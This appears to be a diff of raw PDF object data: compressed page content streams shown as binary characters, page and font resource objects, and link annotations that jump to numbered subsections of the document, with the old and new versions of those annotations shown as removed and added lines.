]Ó2cc­ÕªÃ[¢aÞ2R¯ŽÞG=CxÜ3 ™¤l\ÕE½eÕÛСžoÌ(Q  Íú³œG¾c¢6u®ÁN…æy~”z*ÃDn”õy‚C‘Œ…£ÏÐÒbSQõ?wY‰37 {NÊ®h• dƒ!E - ›)ÒÈõz ¹\ƒbáÆq8ŽÃ×57¨Â·™G·&4¹ª;* !%ŽÈ»`0xPÁ©EÐ…¤yß·£û…ödÒ¤ðA$”_÷E­ø~û]qŠÁ1”!µï -~ö$n&_g"@x"¸·r/,Ñ·e&^,ðë=ðåryN™®‘cºÌtÐ4âSUy ¢¢ aj*ao¶@HÕH]wÍš¼lØ#àiæ-%ã:ŽÔ¯ñ—î¡*£'œ«Š6rõ—vÖîæ„š¾û¦¼Æj`ò[6AjŽ‚ãë('Ošf½]'² D ƒG¹‘øuWX7áF=™2h"ˆÉA4|ÙŽ²@ÀÕ·|‘¦o#±™„niX0Oð@ØÈÜ®ìèe?¢ÔD‡ 0G›÷Ç€Ó?n½ÊK…<«¼™vP‹­)ú'†u0[Œ|ÌÑüÜ»­ûŽ$ßo£ºNO·“Žwn^× †7Sv”0À\Î7ð3ýp -c¡›¤}*¼#ßö yø€Œëß÷¾Ä¡›}˜wnè(ó [ŽSv&§.¸¢¤ Ô†)4mÕµui{…q#<ˆ1€Ï„70¡ÛBM(ï{|Ÿ*Àu2Óh/½FÙ_QÆs9né‘Q’² – >¹™÷æ)ÇlùžJ6’vüÂÜà€AV…²¸Ðä” MlN1MÄ„î2À$^Ñ NûömàmI2Ðsˆï¤ßºqò:°€‹0<ê•,JQ×Ýèÿ@¬^7je^³èÕZXt> endobj -409 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [184.175 469.424 361.226 480.214] -/Subtype/Link/A<> ->> endobj -410 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [462.362 469.424 540.996 480.214] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 747.553 199.325 758.344] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.8) >> >> endobj 411 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [210.933 455.795 274.123 466.585] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 728.777 262.296 739.568] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.9) >> >> endobj 412 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 442.166 159.484 452.956] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 710.001 342.669 720.792] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.10) >> >> endobj 413 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [149.191 214.181 190.637 224.972] -/Subtype/Link/A<> ->> endobj -417 0 obj << -/D [415 0 R /XYZ 72 793.935 null] +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 693.162 327.895 702.016] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.11) >> >> endobj 414 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R /F22 344 0 R /F27 419 0 R /F14 420 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 674.385 430.789 683.239] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.12) >> >> endobj -426 0 obj << -/Length 3354 -/Filter /FlateDecode ->> -stream -xÚµZKsÛ8¾ûWèHUE‚_ÙS2›d3åÌËžÚÃÌ` ²8¦H…¤ìøßo7ºQ4í¤¦v."  ÑèLJ†âÅí"^|¸ø|!á/ä"Oy Y–‹õþâ÷?ãÅÚXÄB—ÅâÁQí:+à[/®.~¹x{}ñÝûD.JQfI¶¸ÞÒJ”*]\o¿G‰X®ŠRGï—eY3;Û/ÿ¼þá»÷2 Ó™qóºA)R\ÄÌ ¬ RŠ2M¤]1ñJ+¡uIC¤PË•”I]/a9»^*íšêóqv½x±JR‘Äî?×{sX®”RQµ?Ôvo›eRDCm:vµÔ=ÀÔÐ㧦¶–¾öË¡n«Æj»úå’çmþ²ë¡jªÞëÆv榪aLøøz²i©GüJ-J­éB䊷üG,ó© ÆG%åEú±ÙÚ6¥’h¨L½\é4‹nêªÙ`1%6±íÄæS©É4åé˜^Á™D¦îqÿp¾wpQÓâvj2,ý‰’ˆ4Ný47@™D-ýÖÖ4Ìœé-3øÌ¾‘Ï<:+ý¯—«4—þT'V¢È³ÅJ*‘%,PsÞm³éqk¥;X÷ÝY*˜?b¥`]ÇÔ¦Ã=›¥Œöv°PÑI ¼M†ýçúúg*uÕf@ÑiçûGÒ63TkS×4Ëý¶iꊗ¢#5Ð%Ò~èªæÖm->ßӺ婫)V*ÃUéH’‘ÈÒ\$Yæ%võîòÝ÷×3’U ‡ÎþÉlŽ7«3n^áEÔv¼k}¤J Òpíqt…2sv‘ÅÓí éîí-±pì-Ïú€”fLïì¾9Ø{ì w^&"Qú\6íq8pP©FU(f<GEF޵ŒOÛÁy‘Š´Moq³9(gØcíÍK9söMëvJRõÎî³ ÖØuôsùe>]RÇÁÜZjóLJâÉi»Y´3ýÎö¯æŽ7@:âÂ)ÇÞ ´jGÕ°£¾ ¡mWÝVs O´4¡œ‘a¦Ú Æï«Æöu'ÁžiñÑwm' Ÿÿœ;ÞMgÖξT£Ès'r(ŸuãYÂr×Ni°êƒÏ…ª©oaŸÃnOÕ3Oï%'ÛU'oáÚœ~Á—ÝC·m;žbØU=ÑŸÅžªŸÛ¹©]ÁÓÑÖAÝòr¬|Ðée‰å'¢(á(—x@T1L·7_ª=Ò÷ÔгQ4DÇ - |Ð= -:®y;Eä¿'1àyoͱ>?$ ÏE9/ÕÏXÉH¼ïV¼V‰iùwâÝo?~üéGØ”Œ#Øa÷HÅ?â4®\¼1Íj’ÚûXx1ª”`£lýàÜ)úið w§È§µz&òiˆ|ÒO±=Ö5­;Ïî·±••N¹B°£§c¡’I€;f1 vx¼^ÉåæçÁ;ÀŽrNEX›˜¾j5öªŒ'DUzåtå°JŠ„Ô_ó ÞÅ©R!q7pM³{Ãö¹HW¢(5ÑŽo./©ðlô+`ù,àAk°ÍÀº^ÙÙ@ŸïàgÍm[ú’Ø]gš7ÌñáPƒxØ‚ cÐLߘA¡Ês‰ÐŒàƒÏH2çp±#áDy!àŒ¿%ìTl±qö–V›x–‰TƒïœSâðm°‹õãºvá5a,3÷Õ¾ªMÇ­qº]ÞçÈkB;F/‹-õá°}9Ù ddUy邎H•ŸK÷êvŠ\(nÇ¢Ä!lǶs -Û0B^óËbÒŒ,öàK27ðõ׉§n$ɤ(â Ój?Åní|\¶P[ª3èïÉÝa+=In×~Ò³]êÌ^vA¹©Z4¾ÙTÄ9v•?KDû ŸõúØQýa‡!¡¡ -ap–·“Î) ŽI¨HÓ´Üàià } Ѱ.VÌü5ƒ{9®Q/tÊÜ9¤ÓSsÛ8'%RÂWºëyóÖ1Q°J «xŠMÕjC½ÀF`T)¼SÁ©'¸b4˜B|P{hÙšžÜ3Rm'¼¼µ³®ôØ¡oR¬•pqfÏÐÂozC=í*„a.€¬ÍÑ¡uÅàIIºû±b™ƒƒ’DçDSÝ™cðÇ®a&ˆq…ºÓúY¼ñBw'4;'¡(Ò@×XðêÛæ¶>rñ=ì´w>aÌ!ô`Lq»“Þ•H‡Ó—2âʪ“Ík•ä›+Ž!Î69`¤à!†IL §Ú@P¸G¯by\Ë_dwÇ'ýƒJÛØd½Å›8—¹Dö=ƒqwøcdaçç%"¿Î¹¬÷G„ xéï†ÙK<°ç#¸¥’à/aw#¸…2›…[dò{älu O«Áܳ“üFδJe£ô‚VÙÉ»»3LMîEA¤ŽUz—Ñ6D xnÉ`ÅA3ÕÀY€ØNl¹˜ˆœº&$H‡ïȃPÇg/i^¦Aùʼn³PlZ›ž—FÛÃï†.w~Ìx1?vñ £[ ìggŒn$uªÉ3§ì©°Ó%P]D‹Ô¹n ëÑJ÷ÕjÝÖ-EÅ›‰L…éŠÍœe*’°ñp¤m]“zy¡º<;?ä,˜V8+¥Ÿ%ÜUK]ì-©b¿Øõq@wO¡7‰E>…sì:Šò‰‹€&ßeÁ¾Ý±¡¹œbrÉæ‘>ƒw¦™“^¦…Vé×Ñ!1PÕé!Y¬\˜%†!¢šfm_ñBù?”"σ™nÌàb4^8ÑŸ5Õ3°/ B§ù“ÈÓd"²\NW-2Mu8Öæ™ --¤Îgq¯“bˆ}_Ý80Mµ5º‹ŒåŠØ9fçu€ „(½§öˆ©Õ4jzèªÁRѬ׶ï'ý­gfðI¿\M YL.H~Cëv¿§ tì”}±Sa¼”»PËS#Ûø^·ÍxWùûŽÍÆvõcå nØ­¬[ (PÐ7ÎÓ`?p€S¥!¥Ê3>‘LJÁKÂEÄ’ ÇÞƒ“ŽRîÑï«ÚÞÚ^°Ę9W:£‡ƒD‹" -œ¼Èøy ¾_–É Ï±Ë¼gš}2˜fŠþÂÕ y€žûÁOß\pt©ÞŽƒ`Hò@ŒWͺ>nìkæúì¹ÖƬkT$?t|°³U»,ävÄüW´ˆuöl¼?ÛùY¼w9R—³@h3ŽÔîvç9N 8áOè•fœH>`”\™™l1˜ðOh?7O"´L^žGÇa¡Ÿ1î·ýpÛÙy¾ÀÊS¬gýœ^Çb¡“°æ§jݵ}»¡¤1¿¬¸‚íî&š½ËLÈÚ97%=6%BpWËõÄàɾÆ/Š ó{¹L¢·¶¯6îJ–$hTh™HµmÝE O‹í3‹D<)¯€;õ‘Òt–—òpIÖîM'á§¢û¦ˆéjûHF2"ÈìuÎðõÿûmÂ¥ ¦c«/\½zd‡ƒOpÍÆÓ%vØ÷ÿÀÄßb# -%uf#ز ^ý+Bñêì¸¤ÊøŠ€dgoޝç4¤A}ªékf¨ù 3Óœe“_yíKDrJVΙR&âgpÚQVª")&Ðf.«Ëü$¬¼ÈœºÄ¯™¥JG&5º¬è²pL"Ävöõ¯¡þD¹§ñSö/×#5W^Í¡`jD쇇`ûºæ]¤LÀ­ŸV‡joIôZĉ"Ð$QáÏ´ðÍ…¦˜ý¼èÊBÄéh/ƒŒ<Ûß7‡îÍ*á|WÂwqÂK–š(Ý]CÜ÷à ¨ÁÐ'd–r®üÛ¯—¯¨š8— -í¹ÉåÿÂHæbÛµ{Þþñ¡»å@üúábñ»£x{ì\¦Ny¶¾<ží™Éüû ¯ÚÞRÑÞìÕÇå¦Ó‚qê3¤eô_t$öæj —¥2Ïʵc$ѧ^·Í½ízÀŠN›þ»¹^Á·<¥hë»à’ÌoI> ZHØ©ÇÐÂÂNéu[N†Jx­ó;ÈñŒ²„aã—yY*‘¨IdãŒ>š}>ðK$§—Ü^»;rú£L#vø‹ðó²žL7=e‡:MwšSª·¥+)ûƒ|ùPwÛ>À@ÿÿfÇzè=Åí?ƒÞ‡v?zfì=°–jL¡ÔT8†sŸR+‘«à”>¼›»û%¹(Šr”ˆ¦‹}?-R¸Nž.Š?ÿtõÌSƒLÓ¹ ç„RO§.PçC$úžÿLrWÍ"Ä\”2ÐîàF)S÷Vº·ê»Ñ"ÍÔyîÆ4>‹?ÃJª„ÎOï½íVon9ÏáK ^=Ÿrƒónø¾¥¯»oÆ/óPØ<6á(x%Ð ª¶ ÙL¼ŒgÅY^#¨3˜k¥‰Ü?.¨ˆO*8=ÍaÕµsÂc¬„þûîúâQ¿è -endstream -endobj -425 0 obj << -/Type /Page -/Contents 426 0 R -/Resources 424 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 345 0 R -/Annots [ 421 0 R 422 0 R 423 0 R ] +415 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 653.672 429.931 664.463] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.3.13) >> +>> endobj +416 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 634.896 149.026 645.687] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.4) >> +>> endobj +417 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 615.567 238.336 627.519] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.4.1) >> +>> endobj +418 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 597.344 342.807 608.135] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.4.2) >> +>> endobj +419 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 578.568 420.414 589.358] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.4.3) >> +>> endobj +420 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 559.791 254.272 570.582] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.4.4) >> >> endobj 421 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [417.171 138.216 469.445 149.007] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 541.015 216.257 551.806] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.4.5) >> >> endobj 422 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [131.854 124.587 210.791 135.434] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 522.239 270.734 533.03] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.4.6) >> >> endobj 423 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [245.493 110.959 277.712 121.749] -/Subtype/Link/A<> ->> endobj -427 0 obj << -/D [425 0 R /XYZ 72 793.935 null] ->> endobj -18 0 obj << -/D [425 0 R /XYZ 72 760.449 null] ->> endobj -22 0 obj << -/D [425 0 R /XYZ 72 350.188 null] ->> endobj -26 0 obj << -/D [425 0 R /XYZ 72 282.02 null] +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 503.463 158.765 514.253] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.5) >> >> endobj 424 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F24 408 0 R /F14 420 0 R /F22 344 0 R /F27 419 0 R /F20 341 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 484.133 379.134 496.086] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.5.1) >> >> endobj -436 0 obj << -/Length 3101 -/Filter /FlateDecode ->> -stream -xÚ½ZY“Û6~Ÿ_¡·¥ªF ïcßÇNœŠ7‰=y²S)H‚$ƺnâ¹YšXº¬Ü4v@õ\høMPÁ„;hêN­–â^uª#M28 NÐ~_t'ž÷_Ý62Í~qüý:Hi -paÂLG'í¶ØqA,r*$ÙÉL D-'îE¤Á óÔîýõ³Ÿž=½[Rì†Á¨]ر®„a¤ž:æÂ5õ «5Ü.2(·j@aÅ} µ\)ê?5AÝð,” > Cç…,`·¡JÓpIl1Å– 6YUì„ÞÁºÅáÂ"Rè¦`]fRNÐ[/ö üø0 –ïN -#8¨¸ZÏÍ÷XQ5j°“ eåVvŠ=b8 ÈØb= ZðXRaWñÔO#è#šècƒE0”ïÆ¹lá­ç§×s¦:ä)¢ÂŸÏ²Vš βQj,2ì03µýy -(lA¥ŠjN_¡ŠÁzq~·@&pPËQ˜Ð9Â`ªw}‹€‡ÎŽûØÊco«ß÷$±QÄàµüÌ®Ì|çß l²vÐÔŸÇ ÐÞ¶e²'õ‡QêæÙ•þÙþzÑLcÓ¢Mî¾§Êð(DI…èË®@c ö`[6.ï‚`‹äŒ¥4¹P¹F.Œ£½À÷J^,[€.:`=­ºñ²O8Wƒd÷fJ0¤ÝÌ!ɦ…ŒµFPÔ?=ú@«¸`håüØœCjŠMZîcS….(lÐÓ¦yW,¡3ŒÜ40rÍèvÙ¡îF‹F¾a@cú3*lsÛÝ¢<®‡¾Än8ú'$ÍPÚ½åŠ:ŸKˆBØ€2+0¢IYœÄrNFEÎV°`Ô÷R7H®,yo£ö軆¹1ˆ¿gó… ¹´U~äœÖ>~¹Ûô³H—?Ø”ÑA1~Pù³7—3È~ÀŸ%¡Çx̹Óç²)ºYàÏòR/!vÂ9 ‘•ûe å“«H0‚Õa'å#†1I³ÏÃ8­ÇÕÝæQ(ljŒÉ§ œ§ƒ?´MÅ|vª=js”:=š¯Ð-G«­Þ€ŠØEs"èã(²$Q&6 -Fƒ‘"•@¥^6‡„Ó €-Gñ\I _Ä;ZÂ(rîÖØÓÍ<`8ëõl„Åë­f‡Âð¨B¼¨Ð ¨Þî[¾‚eÚ„°¡o•¡à;³[Ê"ç»âHÜv\•“Ž>ŽNú3ƒE·æE ¼Óí}z;¹q–þ =©âðR5½aO){„ÒÂVè{¸,ð쇾ë{ùÏèó%¨€†³2†[†t'°~ꃷŸLšt†Æß^ý$äŠ).³Ž«iß ‰¡D8[Sav–á>_ϼšù!ºˆídA¬Þ‰a¦ÖÅx ò¢ N>gVb7 ôJtkmÅÜ;æn4ZŸÇM -¤Zã’p>‹Ä3þqvã„þv3ºÝ<9êº["ƒîü¿Î1X8qÓ“ qW@"if¾fÉud$XåX]bt«· ¦"w€æH—6©Ç€žÍ/ÌS6üÛ‡«–úË‚ìõü ¦’˜¤Øî Lå--¢%õaèᇣ )€ç@¾1`°ÑZ€e‡Vjî-1äõ8¼‡æ¦ïÎ}Çmøu\¼ -òÓ 0,ôïõ&R­°¨ -³H?âx¼ix¸âfñÞ @kgŠ“Ø¹ãä ‚Œú  ·x$þHÑSJ²f–ŽVà¦Þ°†¿ÀEîzÑà§ ñyc -ÏN®ÆÌ‘ÃÛi®ÙÖà¥4é¶mÚ뜲kÕNo9pgG’ÏfÏ*pæ¨qØ-7Ü”\ÙR¯æŠ95”|&…¤'õÿh¿o9†ìKÕÝäèc\À<‹ÿ’7lO¿¬Çfº´§;H=ðäÚ“Ô'´ãWµx·Q|X'!&y 8b7ÈÓeO„ a2Iº°\R{ÁØ Ô€5“è/Ì„¦”1«’){!] •R<èŽér†&’¸…lâ)…ÙøíÕÆ±’ˆ0Zgº±´Pƒá<§ýPè{{µÁ½.n,ŠA±…%¢R`Ù nrz×ÒjHÛðd¦Ce†Ð×´µ‘ÇŒáרqçÒs’ÂQc¯PÏ”Áaf_´\ä­Ü¢•‹ÍDe>žnüžUÛœ `u ŒÜó]®m7â…V!¼`‰ñ²qÍÑ3‘qdÇA¥áµË‹Äå†jÁÝ€O“ÁqCÞÐ#OXóBÙün,\, œ “…ðˆ«… Uüá›™ƒ{^º[JÜl´ÎŸFNnŒ­ÿ”Ÿ†øŠ¢Ú†ËxŸ„¥Ô9n–C³âì -7~ì[¹IÀQ/þó‚{á#E%·­1^„*jpM¾ì°7NÐ?¹üÁÑ„‘"ÀR˜:Ëüâ1r¹€ŸæÚ„|V9Ôñ9ÏQ€}„êðñÄÐù²û—0}õQR]7<øÌ’$r3?/°Åî|-"š?ŽçÝR–¸i6\îl)¦äv1IÓ`ʺ -0¦­åÖnÏΛÄAÊvûP äRÝÛ»ZR̯ki¤<·1¦Ó†fEC|%€Ÿ¥n˜^ÝÛ<ýáÉ«Åë 7÷“ñ]n– -‘AˆTo·£cØ*{“§R€ÉsN»˜NËûÈ¡¯å™“V¾¹\°©Ý ²ÉM¹y6<6°,Ä*Î3ylÐt½eÏ„ô~ƒÆfó)¸ù@6ŠnÄæÉÿ >tº6ç˜%ªÀ~BíÝF“9 -â©@ 6 -„ß?° ‚ª%™`µ9P¦u?ª•‰ÊÒëkH‚Ë »d¨ã‘§ãöü&9ÞE?nR -Q¬ÛáM•¦0M gú>eš²éÕZÈ@ècä”ÿE*w† Ù´•_\+ [˜a{ö -"™@?i#H ÌàaQä»55&’˜2N†[î(õžñòBwåXD_7œ'3DHø7 y5¥v™ËKò´a†ƒ»Å‚„N8 “ì4SáàÚlvIÈ^ÀÖôàÇ ?žüØ©U%¦"þNžYñþ#¡ WÞÕcÂãé/Q>þm#”?>„Ó×6¬ð#[(ð!äMByÖÐÛÅÈdÖòö†·Û}ï•“‡m¼G ØS+;hµD)Ä¡G"¼Š“…mÝMáy9ÕMÙ/<à%¤(~GúM%4wE»ë+Ó©zG&?J}»`üYe}÷íË×6Fšob´Ð_6ú±—èö’¥C!ËDÈÄ ZCû ¶†Ó§„ÙÜkÉRö¨ù> +>> endobj +426 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 447.134 304.82 457.925] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.5.3) >> +>> endobj +427 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 428.358 303.962 439.149] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.5.4) >> >> endobj 428 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [375.958 283.932 424.21 294.723] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 409.582 160.286 420.372] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.6) >> >> endobj 429 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [444.905 283.932 467.095 294.723] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 390.806 366.684 401.596] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.6.1) >> >> endobj 430 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [230.14 176.044 329.234 186.848] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 373.966 167.176 382.82] +/Subtype /Link +/A << /S /GoTo /D (subsection.5.7) >> >> endobj 431 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [337.602 176.044 404.871 186.848] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 355.19 174.148 364.044] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.1) >> >> endobj 432 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [413.239 176.044 540.996 186.848] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 336.414 194.926 345.268] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.2) >> >> endobj 433 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [116.567 162.415 188.601 173.206] -/Subtype/Link/A<> ->> endobj -437 0 obj << -/D [435 0 R /XYZ 72 793.935 null] ->> endobj -30 0 obj << -/D [435 0 R /XYZ 72 235.763 null] +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 317.637 218.36 326.491] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.3) >> >> endobj 434 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F27 419 0 R /F22 344 0 R /F14 420 0 R /F24 408 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 296.371 407.272 308.324] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.4) >> >> endobj -451 0 obj << -/Length 2649 -/Filter /FlateDecode ->> -stream -xÚÍY[oÛF~÷¯ÐÃ¥€h<7Þ²O›¦)¶°‹¤v·X¤EAI#‹k‰TxñeýžË"eÆÉ6AÑ›3ÃáÌœÛw¾3’³›™œ}öáLÁSÎÔ,Ö³8•B¥élµ?{ÿ›œ­aü‡™6Mf÷4k?³QÏÝìêìÝÙ«ë³ó7ZÍR‘F:š]ox #Rή׳÷óE’Úàu97:¸/ve¶ž/Lb‚¬ † ÚîhRuÔÍÄ®`P•w]«ƒjmëèq‹C*È7ø”A³uÜðbyõ ‹^å5?3~ ,Ó²õ>/òº©²¦¬ü~¼N»w0è&×I*lÒËŽ;Õ²èP˜(~^ƒ*¶ãeHA‡¬®½: ì%­öêô.~Ê,+ïjÛ¬ÞºzÚ„R=ë¡H“èô°ä¡ÊÁ+ïò»™\9Ž„ ?åNåSKA«X}öR°Ðnr -c>ÿH«r×î‹ÉI'éе Öíþ0£VÈDœ"‚´(2iP¡ÿmº©÷Ûrç|¬)+4 öÈ9þ |D0ÈÓ¸ýÄ™T¨…{—eð6&¨Z„>ÃXñM=åÉ¡°½n}àÍ®Þ]p¨Æþþ,O÷OÁ×ã^Pá÷±3¥D†š0‚–``OŸ€´0€¥J‡ÁõòPv‹Êw%þ¿ÃÍ -â0ظ¬i+¶ÇDz -è4µv¶Ð t…œ"1§L¸£‚$Ü [9L™`ÐÀåj·÷€(­BX‹G–y‘UÜþU; *ŒEh{CnªrïOBx©Q~’˜•3]ÅoÛbíªÝc^Üð{ÞÉÏeï¡öýŒI®¨e"bŽ]‘w콺Ü4˜.ïqˬò£Óð¼|¼z‡‰ñœå»Ý[œXÖÍMåØŒ9:çe¾ªJZ’æö®z™Äsæ^°íZ‰0ýr -¡“dÚÜ6qØÇ»{p«¶!É!UËš»«rQ»ž´« …Ö}Ê@FB¢ž±qÔ3ö†VÅþЪØ/ùܘæú±ÎºØ>ZW¥q:eÝ8ZzlÝ­CÎDkÒˈ “.qlõ‚ûO, cwyÆ DÅÚ¡nÍc›¶X59Q2èåÅܠ˾Ûä«î‹À(î€bɱjpèÁÇ -¡°:õõÌå{ ëyÚÀO}YÉHH½_‚/ï²Ç í›D¹ÎÀ¸Oø-m'O2ǘ‘<ŸH…I"’T½Thc£‰\Á1åÌ–¦ƒ¬ëoÀÀµü½Ì¹”殫WÙŽÃc¢Œ³™¸×s 8Ò/]j!8Œaü¨¢n‹ýêȆå-Nq…Ÿs›¯‹ìp@s3W‡üc’®Nn&D¿/¸Éà†c\„n?aȘ°O§ÅF_ÃàÇÇ|Ñ—Ž#ˆLB%΋UySäû•‚ó8t"æÝÁ{› ¡*1=_þvÛVUV¯¦ÖÓDB5ÖJ=ʾ„nHܱÐïÊS‰£±—§P5¦ø‡â/G±2xͰÚ]ŽFM…]ŽÒÍÔÔÐT {‘éŽôa·Ï|šUV 㥫¶ØCh§Ž]zàÁ:«éÊ_¼®nü½ðO„‰T8•mµro昪¤ßä;ߺÈk_jÂO@g0ˆµÁ?›aa‘Ž®r7£ Ëw¨AÿºèÈSü¡ÊËöH öYS¿ü¬bíü±à*é³p@âónþ›wš.÷àÃ5&Ñ ‰?B 9Éwz2É)ÌA«@5_^™þqÙ– ›þã¡lõ_V¸/²Û_O´×߽ƒFýõ¶]Þĸy‰8%«øîU{¯ñ ->_¶˜ÿlåþôöïÓôànMJ¹8å©rqtZ¹øfÃwx: huë²Ê¸Ïy–^ÁØ¡/NèÃ*ï­ñÑ[qÖøW$šÖl3¿#¦‡ eç¤5ú Ü›¤gÚíi%ZîÆÕ¶ø -¨j|fHÒA®Å~âkDx1, -O£^“&*ªX yüÉjÍŒ /ì-¤¢D¥ÙˆøzNÖ„Q¢©ØxûØl‰iX¼m¢ ìŽÕL±8 µÇñ77&ñ)eé8ðÒy+00ýˆS%ö))ôg º€ðÏÓa^ü7eô)‰9h&ÛÕ%·Æ?³¡1Ú†ßðý¢Å»=†Xš^’4kße‚1˜SÁsíöˆ ‡süæª]2; ÿ®=7Áš¦ Ï×k ‰„†¸«—â&ï~³%éø$Íé¬^¢µÿ‰wWúŸg'B*dÿåäÏÒO¦/HÀ"KÎÐÙ|B^ïoóE¨Ã ¾+¸±½ß‚`¤rØ6Í¡~y~33>d윛çô»R[Üžwd£ö%š:åw×gÿ?%  -endstream -endobj -450 0 obj << -/Type /Page -/Contents 451 0 R -/Resources 449 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 453 0 R -/Annots [ 438 0 R 439 0 R 440 0 R 441 0 R 442 0 R 443 0 R 444 0 R 445 0 R ] +435 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 280.085 166.373 288.939] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.5) >> +>> endobj +436 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 259.372 241.047 270.163] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.6) >> +>> endobj +437 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 240.596 210.447 251.387] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.7) >> >> endobj 438 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [228.845 334.112 346.736 344.902] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 223.756 227.49 232.61] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.8) >> >> endobj 439 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 305.373 200.438 316.164] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 204.98 215.787 213.834] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.9) >> >> endobj 440 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 283.774 205.971 294.565] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 186.204 246.719 195.058] +/Subtype /Link +/A << /S /GoTo /D (subsubsection.5.7.10) >> >> endobj 441 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 262.175 195.458 272.966] -/Subtype/Link/A<> +/Border[0 0 0]/H/I/C[1 0 0] 